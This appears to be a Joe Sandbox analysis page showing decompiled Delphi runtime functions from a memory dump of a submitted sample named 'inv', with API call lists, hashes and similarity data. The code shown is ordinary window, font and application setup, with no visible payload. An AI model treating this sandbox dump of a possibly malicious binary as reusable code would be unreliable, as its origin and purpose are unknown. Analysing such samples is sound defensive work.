                                  			E0044A410(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L004061D0(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                  0x0044a41c
                                  0x0044a426
                                  0x0044a42f
                                  0x0044a436
                                  0x0044a439
                                  0x0044a43a
                                  0x0044a445
                                  0x0044a449

                                  APIs
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0044A43A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4255912815-0
                                  • Opcode ID: 86dcf55dc5099bfbdb52f651bed1b042a6fdd6890c02238dd2fa5d2fcae3f7cb
                                  • Instruction ID: f8f46fd7d8a48ab55b09033a5d1a75434b3a0307ace68058ee4c439b565e07c0
                                  • Opcode Fuzzy Hash: 86dcf55dc5099bfbdb52f651bed1b042a6fdd6890c02238dd2fa5d2fcae3f7cb
                                  • Instruction Fuzzy Hash: 11F0C579205608AFCB40DF9DC588D4AFBE8BB4C260B058195BD88CF322C234FD808F90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00437098, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E00437098(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x437210);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E004087F0("Delphi%.8X", 0,  &_v16,  &_v8);
				E00403E64(0x44fb20, _v8);
				_t25 =  *0x44fb20; // 0x2191290
				 *0x44fb1c = GlobalAddAtomA(E004042D0(_t25));
				_t29 =  *0x44f664; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E004087F0("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00403E64(0x44fb24, _v20);
				_t35 =  *0x44fb24; // 0x21912ac
				 *0x44fb1e = GlobalAddAtomA(E004042D0(_t35));
				_t38 =  *0x44fb24; // 0x21912ac
				 *0x44fb28 = RegisterClipboardFormatA(E004042D0(_t38));
				 *0x44fb60 = E00413738(1);
				E00436C9C();
				 *0x44fb10 = E00436AC4(1, 1);
				_t47 = E00448B2C(1, __edi);
				_t78 =  *0x44e0ec; // 0x44fbb4
				 *_t78 = _t47;
				_t49 = E00449C10(0, 1);
				_t80 =  *0x44dfb8; // 0x44fbb0
				 *_t80 = _t49;
				_t50 =  *0x44dfb8; // 0x44fbb0
				E0044B778( *_t50, 1);
				_t53 =  *0x426ef4; // 0x426ef8
				E00412EEC(_t53, 0x428ff0, 0x429000);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x44d9d0 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x437217);
				E00403E10( &_v20);
				return E00403E10( &_v8);
			}
























                                  0x004370a1
                                  0x004370a4
                                  0x004370a9
                                  0x004370aa
                                  0x004370af
                                  0x004370b2
                                  0x004370be
                                  0x004370c1
                                  0x004370cf
                                  0x004370dc
                                  0x004370e1
                                  0x004370f1
                                  0x004370fb
                                  0x00437100
                                  0x00437103
                                  0x0043710c
                                  0x0043710f
                                  0x00437120
                                  0x0043712d
                                  0x00437132
                                  0x00437142
                                  0x00437148
                                  0x00437158
                                  0x00437169
                                  0x0043716e
                                  0x0043717f
                                  0x0043718d
                                  0x00437192
                                  0x00437198
                                  0x004371a3
                                  0x004371a8
                                  0x004371ae
                                  0x004371b0
                                  0x004371b9
                                  0x004371c8
                                  0x004371cd
                                  0x004371dc
                                  0x004371e0
                                  0x004371ed
                                  0x004371ed
                                  0x004371f4
                                  0x004371f7
                                  0x004371fa
                                  0x00437202
                                  0x0043720f

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,00000000,00437210), ref: 004370B9
                                  • GlobalAddAtomA.KERNEL32 ref: 004370EC
                                  • GetCurrentThreadId.KERNEL32 ref: 00437107
                                  • GlobalAddAtomA.KERNEL32 ref: 0043713D
                                  • RegisterClipboardFormatA.USER32 ref: 00437153
                                    • Part of subcall function 00413738: RtlInitializeCriticalSection.KERNEL32(00411274,?,?,0041A201,00000000,0041A225), ref: 00413757
                                    • Part of subcall function 00436C9C: SetErrorMode.KERNEL32(00008000), ref: 00436CB5
                                    • Part of subcall function 00436C9C: GetModuleHandleA.KERNEL32(USER32,00000000,00436E02,?,00008000), ref: 00436CD9
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436CE6
                                    • Part of subcall function 00436C9C: LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E02,?,00008000), ref: 00436D02
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D24
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436D39
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436D4E
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436D63
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436D78
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436D8D
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436DA2
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436DB7
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436DCC
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436DE1
                                    • Part of subcall function 00436C9C: SetErrorMode.KERNEL32(?,00436E09,00008000), ref: 00436DFC
                                    • Part of subcall function 00448B2C: GetKeyboardLayout.USER32(00000000), ref: 00448B71
                                    • Part of subcall function 00448B2C: 72E7AC50.USER32(00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BC6
                                    • Part of subcall function 00448B2C: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BD0
                                    • Part of subcall function 00448B2C: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000), ref: 00448BDB
                                    • Part of subcall function 00449C10: LoadIconA.USER32(00400000,MAINICON), ref: 00449CF5
                                    • Part of subcall function 00449C10: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D27
                                    • Part of subcall function 00449C10: OemToCharA.USER32(?,?), ref: 00449D3A
                                    • Part of subcall function 00449C10: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D7A
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00437210), ref: 004371D7
                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 004371E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                  • API String ID: 2159221912-1126952177
                                  • Opcode ID: 3657999068e5a9176a5cdcc0c49e48ce725bdc0498983a54a96d9f354a58f1aa
                                  • Instruction ID: fd9b2268af2c43c039bc95537116f8836b317f1e8a1384397f1a1c3436055077
                                  • Opcode Fuzzy Hash: 3657999068e5a9176a5cdcc0c49e48ce725bdc0498983a54a96d9f354a58f1aa
                                  • Instruction Fuzzy Hash: E8414274A046459BC700EFBAEC5294EB7E5EB4A348F51447EF400E73A2DB38A904CB9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449F18, Relevance: 13.6, APIs: 9, Instructions: 132windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 42%
                                  			E00449F18(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x44a0b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x44a0c0);
					return E00403E10( &_v48);
				}
				_t22 =  *0x44e014; // 0x44f048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00419F54(E0044A498, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x44dd08 = L004061D0;
				_t26 =  *0x44dd28; // 0x449c00
				_t27 =  *0x44f664; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x44f664; // 0x400000
					 *0x44dd14 = _t62;
					_t88 = RegisterClassA(0x44dd04);
					if(_t88 == 0) {
						_t64 =  *0x44ddc8; // 0x41a290
						E00405910(_t64,  &_v48);
						E0040B070(_v48, 1);
						E0040384C();
					}
				}
				_t29 =  *0x44de70; // 0x44f8f8
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x44de70; // 0x44f8f8
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x44f664; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x1eec0044
				_t39 = E004042D0( *_t7);
				_t40 =  *0x44dd28; // 0x449c00, executed
				_t41 = E00406728(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x44208c
				E00403E10(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x44dee4; // 0x44fb14
				if( *_t47 != 0) {
					_t55 = E0044AB9C(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0044AB9C(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x44dee4; // 0x44fb14
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}




























                                  0x00449f21
                                  0x00449f24
                                  0x00449f28
                                  0x00449f29
                                  0x00449f2e
                                  0x00449f31
                                  0x00449f3b
                                  0x0044a0a3
                                  0x0044a0a5
                                  0x0044a0a8
                                  0x0044a0ab
                                  0x0044a0b8
                                  0x0044a0b8
                                  0x00449f41
                                  0x00449f49
                                  0x00000000
                                  0x00000000
                                  0x00449f55
                                  0x00449f5a
                                  0x00449f62
                                  0x00449f6b
                                  0x00449f71
                                  0x00449f7e
                                  0x00449f80
                                  0x00449f85
                                  0x00449f94
                                  0x00449f97
                                  0x00449f9c
                                  0x00449fa1
                                  0x00449fb0
                                  0x00449fb5
                                  0x00449fb5
                                  0x00449f97
                                  0x00449fbc
                                  0x00449fc5
                                  0x00449fc7
                                  0x00449fc9
                                  0x00449fc9
                                  0x00449fcf
                                  0x00449fd8
                                  0x00449fda
                                  0x00449fdc
                                  0x00449fdc
                                  0x00449fdf
                                  0x00449fe0
                                  0x00449fe2
                                  0x00449fe4
                                  0x00449fe6
                                  0x00449fe8
                                  0x00449fed
                                  0x00449fee
                                  0x00449ff0
                                  0x00449ff6
                                  0x0044a002
                                  0x0044a007
                                  0x0044a00c
                                  0x0044a00f
                                  0x0044a015
                                  0x0044a01a
                                  0x0044a021
                                  0x0044a027
                                  0x0044a02b
                                  0x0044a030
                                  0x0044a038
                                  0x0044a03c
                                  0x0044a049
                                  0x0044a04d
                                  0x0044a054
                                  0x0044a05c
                                  0x0044a060
                                  0x0044a060
                                  0x0044a067
                                  0x0044a070
                                  0x0044a07a
                                  0x0044a087
                                  0x0044a08c
                                  0x0044a094
                                  0x0044a09e
                                  0x0044a09e
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00419F54: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00419F72
                                  • GetClassInfoA.USER32 ref: 00449F77
                                  • RegisterClassA.USER32 ref: 00449F8F
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  • SetWindowLongA.USER32 ref: 0044A02B
                                  • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 0044A04D
                                  • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A060
                                  • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A06B
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A07A
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A087
                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A09E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                  • String ID:
                                  • API String ID: 2103932818-0
                                  • Opcode ID: eb6d24ecf55c4227565050ea5637d0d09927b92954369b9857cef46955736244
                                  • Instruction ID: baf1d1b52cd809640e557e6153a66deda530f32a29d7c12e5c3fb2665838f6dc
                                  • Opcode Fuzzy Hash: eb6d24ecf55c4227565050ea5637d0d09927b92954369b9857cef46955736244
                                  • Instruction Fuzzy Hash: 97419274B402006FF710EF69DC82F6A37A8AB56704F544476F900EF2E2D6B9AC10876D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449308, Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 89%
                                  			E00449308(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x44fbb0 != 0) {
					_t54 =  *0x44fbb0; // 0x2191714
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x44944d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x44fbb0 != 0) {
					_t52 =  *0x44fbb0; // 0x2191714
					E0044B778(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041C0BC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041C0BC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041C1A0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041C0BC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041C0BC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041C0BC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041BF00( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041BF00( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x449454);
				if( *0x44fbb0 != 0) {
					_t38 =  *0x44fbb0; // 0x2191714
					return E0044B778(_t38, _v5);
				}
				return 0;
			}






















                                  0x00449308
                                  0x00449309
                                  0x0044930b
                                  0x00449312
                                  0x00449314
                                  0x0044931f
                                  0x00449321
                                  0x0044932c
                                  0x0044932c
                                  0x00449331
                                  0x00449332
                                  0x00449337
                                  0x0044933a
                                  0x00449344
                                  0x00449348
                                  0x0044934d
                                  0x0044934d
                                  0x00449363
                                  0x0044937f
                                  0x00449386
                                  0x0044938c
                                  0x00449365
                                  0x00449369
                                  0x00449370
                                  0x00449376
                                  0x00449376
                                  0x00449391
                                  0x004493a8
                                  0x004493af
                                  0x004493e5
                                  0x004493f0
                                  0x004493f7
                                  0x004493fe
                                  0x00449404
                                  0x004493b1
                                  0x004493b8
                                  0x004493bf
                                  0x004493c5
                                  0x004493d1
                                  0x004493d8
                                  0x004493de
                                  0x004493de
                                  0x00449409
                                  0x00449414
                                  0x00449419
                                  0x00449424
                                  0x0044942e
                                  0x00449431
                                  0x0044943d
                                  0x00449442
                                  0x00000000
                                  0x00449447
                                  0x0044944c

                                  APIs
                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 0044935C
                                  • CreateFontIndirectA.GDI32(?), ref: 00449369
                                  • GetStockObject.GDI32(0000000D), ref: 0044937F
                                    • Part of subcall function 0041C1A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C1AD
                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004493A8
                                  • CreateFontIndirectA.GDI32(?), ref: 004493B8
                                  • CreateFontIndirectA.GDI32(?), ref: 004493D1
                                  • GetStockObject.GDI32(0000000D), ref: 004493F7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                  • String ID:
                                  • API String ID: 2891467149-0
                                  • Opcode ID: 73e832a2b2fa7d19b0e00d71a02846332b615da9f9dac6651429aae989212ca0
                                  • Instruction ID: ad277987319bc6f5eba6e6121e29579943c1d28b0af3c7a9d09895272ff55ce0
                                  • Opcode Fuzzy Hash: 73e832a2b2fa7d19b0e00d71a02846332b615da9f9dac6651429aae989212ca0
                                  • Instruction Fuzzy Hash: EF31C834644644DBEB50EBA5CC92B9A37A4EB49304F4440B7F908DB296DF789C49C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449C10, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E00449C10(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E004033E4(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E00418EC4(_t91, 0);
				_t42 =  *0x44df2c; // 0x44d3c4
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x44df2c; // 0x44d3c4
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x44b268;
				}
				_t43 =  *0x44dfd4; // 0x44d3cc
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x44dfd4; // 0x44d3cc
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E0044B460;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E004030A8(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E004030A8(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00420CE0(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x44de54; // 0x44f02c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E004210B0(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x44ba00;
				_t60 =  *0x44de54; // 0x44f02c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040BDAC(0x5c);
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408164( &_v261, _t27);
				}
				_t69 = E0040BDD4( &_v261, 0x2e);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44208c
				E00404080(_t31, 0x100,  &_v261);
				_t75 =  *0x44dd58; // 0x44f034
				if( *_t75 == 0) {
					E00449F18(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E0044BBDC(_t90, 0x100);
				E0044C5A0(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E0040343C(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                  0x00449c10
                                  0x00449c10
                                  0x00449c1d
                                  0x00449c1f
                                  0x00449c22
                                  0x00449c22
                                  0x00449c27
                                  0x00449c2a
                                  0x00449c30
                                  0x00449c35
                                  0x00449c3f
                                  0x00449c41
                                  0x00449c46
                                  0x00449c49
                                  0x00449c49
                                  0x00449c4f
                                  0x00449c59
                                  0x00449c5b
                                  0x00449c60
                                  0x00449c63
                                  0x00449c63
                                  0x00449c69
                                  0x00449c79
                                  0x00449c8b
                                  0x00449c93
                                  0x00449c98
                                  0x00449c9e
                                  0x00449ca5
                                  0x00449cac
                                  0x00449cb2
                                  0x00449cb8
                                  0x00449cbf
                                  0x00449cc6
                                  0x00449ccd
                                  0x00449ce0
                                  0x00449ce2
                                  0x00449ced
                                  0x00449cf5
                                  0x00449cfe
                                  0x00449d03
                                  0x00449d03
                                  0x00449d09
                                  0x00449d0c
                                  0x00449d1f
                                  0x00449d27
                                  0x00449d3a
                                  0x00449d47
                                  0x00449d4e
                                  0x00449d50
                                  0x00449d59
                                  0x00449d59
                                  0x00449d66
                                  0x00449d6d
                                  0x00449d6f
                                  0x00449d6f
                                  0x00449d7a
                                  0x00449d7f
                                  0x00449d90
                                  0x00449d95
                                  0x00449d9d
                                  0x00449da1
                                  0x00449da1
                                  0x00449da6
                                  0x00449daa
                                  0x00449dae
                                  0x00449db2
                                  0x00449dbb
                                  0x00449dc3
                                  0x00449dca
                                  0x00449dcf
                                  0x00449dd5
                                  0x00449dd7
                                  0x00449ddc
                                  0x00449de3
                                  0x00449ded

                                  APIs
                                  • LoadIconA.USER32(00400000,MAINICON), ref: 00449CF5
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D27
                                  • OemToCharA.USER32(?,?), ref: 00449D3A
                                  • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D7A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
